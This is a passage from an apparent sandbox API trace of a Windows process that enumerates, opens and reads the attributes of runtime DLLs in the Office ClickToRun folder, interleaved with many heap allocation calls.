shared\\clicktorun\\api-ms-win-crt-string-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.533] GetFileType (hFile=0x42c) returned 0x1 [0074.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.533] CloseHandle (hObject=0x42c) returned 1 [0074.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0074.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0074.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0074.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0074.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0074.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0074.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0074.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0074.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0074.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0074.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0074.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0074.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0074.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0074.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0074.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0074.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0074.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0074.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0074.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0074.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0074.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0074.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0074.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0074.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0074.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0074.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0074.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0074.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0074.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0074.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0074.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0074.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0074.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0074.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0074.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0074.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0074.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0074.535] AreFileApisANSI () returned 1 [0074.535] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 91 [0074.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb6) returned 0x5a6b8 [0074.535] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=91 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll") returned 91 [0074.535] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-string-l1-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x60c0)) returned 1 [0074.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0074.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0074.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0074.535] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.535] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.535] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x52c0, dwReserved0=0x313f518, dwReserved1=0x2000002, cFileName="api-ms-win-crt-time-l1-1-0.dll", cAlternateFileName="AP5E4C~1.DLL")) returned 1 [0074.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0074.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x690d0 [0074.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0074.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0074.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0074.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0074.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0074.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0074.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0074.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0074.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0074.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0074.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0074.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0074.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0074.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0074.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0074.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0074.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0074.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0074.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0074.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x5a6b8 [0074.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0074.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0074.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x80a30 [0074.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.536] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.536] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.536] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.536] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0074.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0074.536] AreFileApisANSI () returned 1 [0074.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 89 [0074.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0074.536] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.536] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0074.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0074.536] AreFileApisANSI () returned 1 [0074.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89 [0074.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x5a6b8 [0074.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=89 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll") returned 89 [0074.537] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-time-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.537] GetFileType (hFile=0x42c) returned 0x1 [0074.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.537] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0074.537] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0074.537] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0074.537] CloseHandle (hObject=0x42c) returned 1 [0074.537] AreFileApisANSI () returned 1 [0074.537] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89 [0074.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x5a6b8 [0074.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=89 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll") returned 89 [0074.538] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-time-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.538] GetFileType (hFile=0x42c) returned 0x1 [0074.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.538] CloseHandle (hObject=0x42c) returned 1 [0074.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0074.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0074.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0074.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0074.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0074.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0074.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0074.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0074.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0074.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0074.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0074.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0074.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0074.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0074.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0074.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0074.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0074.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0074.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0074.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0074.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0074.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0074.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0074.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0074.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0074.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0074.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0074.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0074.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0074.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0074.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0074.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0074.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0074.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0074.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0074.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0074.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0074.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0074.707] AreFileApisANSI () returned 1 [0074.708] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89 [0074.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x5a6b8 [0074.708] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=89 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll") returned 89 [0074.708] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-time-l1-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x52c0)) returned 1 [0074.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0074.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0074.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0074.708] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.710] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.710] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0, dwReserved0=0x313f518, dwReserved1=0x2000002, cFileName="api-ms-win-crt-utility-l1-1-0.dll", cAlternateFileName="AP80F4~1.DLL")) returned 1 [0074.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0074.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0074.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0074.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0074.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0074.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0074.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0074.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0074.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0074.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0074.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0074.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0074.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0074.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0074.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0074.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0074.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0074.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0074.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0074.712] HeapFree (in: hHeap=0x20000, 